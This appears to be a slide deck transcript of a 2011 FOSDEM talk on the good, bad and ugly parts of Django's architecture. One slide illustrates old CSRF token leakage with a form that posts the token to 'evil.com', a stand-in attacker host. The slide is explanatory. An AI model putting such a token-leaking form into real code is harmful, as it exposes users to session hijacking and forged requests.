Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Django's Architecture: The Good, The Bad, and The Ugly

Django's Architecture: The Good, The Bad, and The Ugly

A talk I gave at FOSDEM 2011.

Andrew Godwin

October 22, 2011

More Decks by Andrew Godwin

Other Decks in Programming


  1. The Good, The Bad, & The Ugly Django's Architecture: Andrew

    Godwin FOSDEM 2011
  2. Django core committer Mercenary programmer Startup founder (ep.io)

  3. Django: A Brief History

  4. Initial Public Release in 2005

  5. 1.0 in 2008

  6. 1.3 in a few weeks

  7. Basic Layout

  8. contrib core db dispatch http forms middleware shortcuts templates views

  9. contrib admin auth comments contenttypes flatpages gis humanize localflavor messages

    sessions staticfiles syndication
  10. core cache files handlers mail management serializers servers paginator urlresolvers

  11. db backends models

  12. others views.decorators views.generic csrf test forms.widgets forms.fields forms.formsets forms.models

  13. Almost every piece of code has been changed since 2005

  14. ""Good, Bad, Ugly?""

  15. Lessons from both the past and the present

  16. Some stuff here is historical (we fixed it, thankfully)

  17. There's still nasty bits (we're working on those)

  18. The Good

  19. contrib.admin

  20. admin.site.register( Book, list_display = [ "title", "slug", ], prepopulated_fields =

    { "slug": ( "title", "description", ) } )
  21. The Model Layer (sometimes incorrectly called the ORM)

  22. Sensible Abstractions (sessions, caching, mail, etc.)

  23. GeoDjango (contrib.gis)

  24. from django.contrib.gis.db import models class Lakes(models.Model): name = models.CharField(max_length=100) rate

    = models.IntegerField() geom = models.MultiPolygonField() objects = models.GeoManager() >>> lake3 = Lakes.objects.get(id=3) >>> newlake.geom.contains(lake3.geom) True
  25. None
  26. Debugging Tools (./manage.py shell, testing tools, culture)

  27. CSRF Protection (the new type)

  28. Auto-escaping

  29. View API simplicity

  30. Python

  31. MultiDB

  32. Small actual core

  33. Documentation (both the core docs and the culture)

  34. The Community

  35. Not being too high-level

  36. The Bad

  37. pre-1.2 CSRF Would you like token leakage with that?

  38. <form action="/someview/" method="POST"> ... </form>

  39. <form action="/someview/" method="POST"> ... <input name="csrftoken" ...></form>

  40. <form action="http://evil.com" method="POST"> ... <input name="csrftoken" ...></form>

  41. Schema changes Add a column? Oh, no, not sure we

    can do that.
  42. Template Implementation Hasn't changed that much.

  43. The Ugly

  44. ""Magic"" It's hard to define, but you know it when

    you see it.
  45. Too many regular expressions They're great until they're 100+ chars

  46. (^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)* # dot-atom |^"([\001-\010\013\014\016-\037!#-\[\]-\177]|\\[\001-011\013\014\016-\177])*" # quoted-string )@(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?$' # domain (^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*

    # dot-atom |^"([\001-\010\013\014\016-\037!#-\[\]-\177]|\\[\001-011\013\014\016-\177])*" # quoted-string )@(?:[A-Z0-9]+(?:-*[A-Z0-9]+)*\.)+[A-Z]{2,6}$ # domain
  47. Customising Auth Can't really touch it.

  48. {% endifnotequal %} Thankfully we fixed this in 1.2.

  49. Are there lessons to be learnt?

  50. Not everything needs fixing now A lot of these issues

    have third-party solutions
  51. How do you get better? Consistency, not always writing new

    features, and people with too much free time.
  52. Thanks. Andrew Godwin @andrewgodwin http://aeracode.org